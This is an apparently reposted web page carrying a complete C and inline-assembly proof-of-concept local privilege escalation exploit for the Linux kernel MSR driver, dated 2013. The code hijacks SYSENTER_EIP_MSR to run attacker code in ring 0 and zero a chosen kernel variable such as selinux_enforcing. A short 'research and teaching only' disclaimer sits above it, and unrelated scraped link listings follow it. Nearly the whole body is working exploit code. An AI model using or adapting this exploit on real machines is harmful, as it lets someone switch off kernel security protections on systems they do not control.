Linux Kernel 'MSR' Driver Local Privilege Escalation
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
- // can do whatever in the commented area, re-enable module support, etc
- // requires CONFIG_X86_MSR and just uid 0
- // a small race exists between the time when the MSR is written to the first
- // time and when we issue our sysenter
- // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
- // configured to take a hex arg of a dword pointer to set to 0
- // (modules_disabled, selinux_enforcing, take your pick)
- //
- // Hello to Red Hat, who has shown yet again to not care until a
- // public exploit is released. Not even a bugtraq entry existed in
- // their system until this was published -- and they have a paid team
- // of how many?
- // It's not as if I didn't mention the problem and existence of an easy
- // exploit multiple times prior:
- // https://twitter.com/grsecurity/status/298977370776432640
- // https://twitter.com/grsecurity/status/297365303095078912
- // https://twitter.com/grsecurity/status/297189488638181376
- // https://twitter.com/grsecurity/status/297030133628416000
- // https://twitter.com/grsecurity/status/297029470072745984
- // https://twitter.com/grsecurity/status/297028324134359041
- //
- // spender 2013
- #define _GNU_SOURCE
- #include<stdio.h>
- #include<sched.h>
- #include<unistd.h>
- #include<sys/types.h>
- #include<sys/stat.h>
- #include<fcntl.h>
- #include<stdlib.h>
- #include<sys/time.h>
- #include<sys/resource.h>
- #include<sys/mman.h>
- #define SYSENTER_EIP_MSR 0x176
- u_int64_t msr;
- unsignedlong ourstack[65536];
- u_int64_t payload_data[16];
- externvoid*_ring0;
- externvoid*_ring0_end;
- void ring0(void)
- {
- __asm volatile(".globl _ring0\n"
- "_ring0:\n"
- ".intel_syntax noprefix\n"
- ".code64\n"
- // set up stack pointer with 'ourstack'
- "mov esp, ecx\n"
- // save registers, contains the original MSR value
- "push rax\n"
- "push rbx\n"
- "push rcx\n"
- "push rdx\n"
- // play with the kernel here with interrupts disabled!
- "mov rcx, qword ptr [rbx+8]\n"
- "test rcx, rcx\n"
- "jz skip_write\n"
- "mov dword ptr [rcx], 0\n"
- "skip_write:\n"
- // restore MSR value before returning
- "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
- "mov eax, dword ptr [rbx]\n"
- "mov edx, dword ptr [rbx+4]\n"
- "wrmsr\n"
- "pop rdx\n"
- "pop rcx\n"
- "pop rbx\n"
- "pop rax\n"
- "sti\n"
- "sysexit\n"
- ".code32\n"
- ".att_syntax prefix\n"
- ".global _ring0_end\n"
- "_ring0_end:\n"
- );
- }
- unsignedlong saved_stack;
- int main(int argc,char*argv[])
- {
- cpu_set_tset;
- int msr_fd;
- int ret;
- u_int64_t new_msr;
- struct sched_param sched;
- u_int64_t resolved_addr =0ULL;
- if(argc ==2)
- resolved_addr = strtoull(argv[1], NULL,16);
- /* can do this without privilege */
- mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
- mlock(&payload_data,sizeof(payload_data));
- CPU_ZERO(&set);
- CPU_SET(0,&set);
- sched.sched_priority =99;
- ret = sched_setscheduler(0, SCHED_FIFO,&sched);
- if(ret){
- fprintf(stderr,"Unable to set priority.\n");
- exit(1);
- }
- ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
- if(ret){
- fprintf(stderr,"Unable to set affinity.\n");
- exit(1);
- }
- msr_fd = open("/dev/cpu/0/msr", O_RDWR);
- if(msr_fd <0){
- msr_fd = open("/dev/msr0", O_RDWR);
- if(msr_fd <0){
- fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
- exit(1);
- }
- }
- lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
- ret = read(msr_fd,&msr,sizeof(msr));
- if(ret !=sizeof(msr)){
- fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
- exit(1);
- }
- // stuff some addresses in a buffer whose address we
- // pass to the "kernel" via register
- payload_data[0]= msr;
- payload_data[1]= resolved_addr;
- printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
- fflush(stdout);
- lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
- new_msr =(u_int64_t)(unsignedlong)&_ring0;
- printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
- fflush(stdout);
- ret = write(msr_fd,&new_msr,sizeof(new_msr));
- if(ret !=sizeof(new_msr)){
- fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
- exit(1);
- }
- __asm volatile(
- ".intel_syntax noprefix\n"
- ".code32\n"
- "mov saved_stack, esp\n"
- "lea ecx, ourstack\n"
- "lea edx, label2\n"
- "lea ebx, payload_data\n"
- "sysenter\n"
- "label2:\n"
- "mov esp, saved_stack\n"
- ".att_syntax prefix\n"
- );
- printf("Success.\n");
- return0;
- }
Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://ha ...
- Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞
漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...
- [转]Mac OS X local privilege escalation (IOBluetoothFamily)
Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...
- Linux Kernel ---- PCI Driver 分析
自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...
- [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
#include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...
- OSCP Learning Notes - Privilege Escalation
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...
- ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)
ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...
- Linux Kernel - Debug Guide (Linux内核调试指南 )
http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...
随机推荐
- 删除右键菜单的“用阿里旺旺发送此文件”项
在运行对话框里的输入框内输入Regedit.exe,点击确定按钮就启动了注册表编辑器程序. 在注册表编辑器窗口左侧展开HKEY_CLASSES_ROOT\CLSID{0DE1378D-F811-40E ...
- Java基础知识强化之集合框架笔记43:Set集合之TreeSet存储Integer类型的元素并遍历
1. TreeSet类概述: • 能够对元素按照某种规则进行排序. • 或者根据创建set时提供的Comparator进行排序 • 具体取决于使用的构造方法 2. 代码示例: package cn.i ...
- 17、SQL Server 备份和还原
SQL Server 备份 恢复模式 SQL Server 数据恢复模式分为三种:完整恢复模式.大容量日志恢复模式.简单恢复模式. 完整恢复模式 默认的恢复模式,它会完整记录下操作数据库的每一个步骤, ...
- Unity3D 相机跟随主角移动
这里给主相机绑定一个脚本. 脚本写为: using UnityEngine; using System.Collections; public class camerafollow : MonoBeh ...
- JAVAWEB 生成excel文字在一格显示两位不变成#号
在用java生成excel的时候会发现这种问题, 如果是人家给的模板还好,如果不是模板,而是通过代码生成的话, 就需要进行处理了, 一个小单元格,如果是一位的话,如1-9显示没有问题,一旦是两位的话, ...
- PL/SQL Developer远程连接Oracle数据库
首先打开电脑,到pl/sql安装的指定目录[D:\app\DZL\product\11.2.0\dbhome_1\NETWORK\ADMIN]找到[tnsnames.ora] 打开[tnsna ...
- 一条sql语句循环插入N条不同记录(转)
SET NOCOUNT ON IF (OBJECT_ID('TB' ) IS NOT NULL ) DROP TABLE TB GO CREATE TABLE TB(ID INT IDENTITY ( ...
- AngularJS+NodeJS环境搭建
需要安装的软件: node-v0.12.7-x64.msi python-2.7.10.amd64.msi Git-2.5.1-64-bit.exe (注意:Git安装时,需要选择的步骤) 安装位置 ...
- 关键字throw(something)限制
C++函数后加关键字throw(something)限制,是对这个函数的异常安全性作出限制.void f() throw() 表示f不允许抛出任何异常,即f是异常安全的.void f() throw( ...
- 转载-Linux下svn搭建配置流程
Linux下svn搭建配置流程 一. 源文件编译安装.源文件共两个,为: 1. 下载subversion源文件 subversion-1.6.1.tar.gz http://d136 ...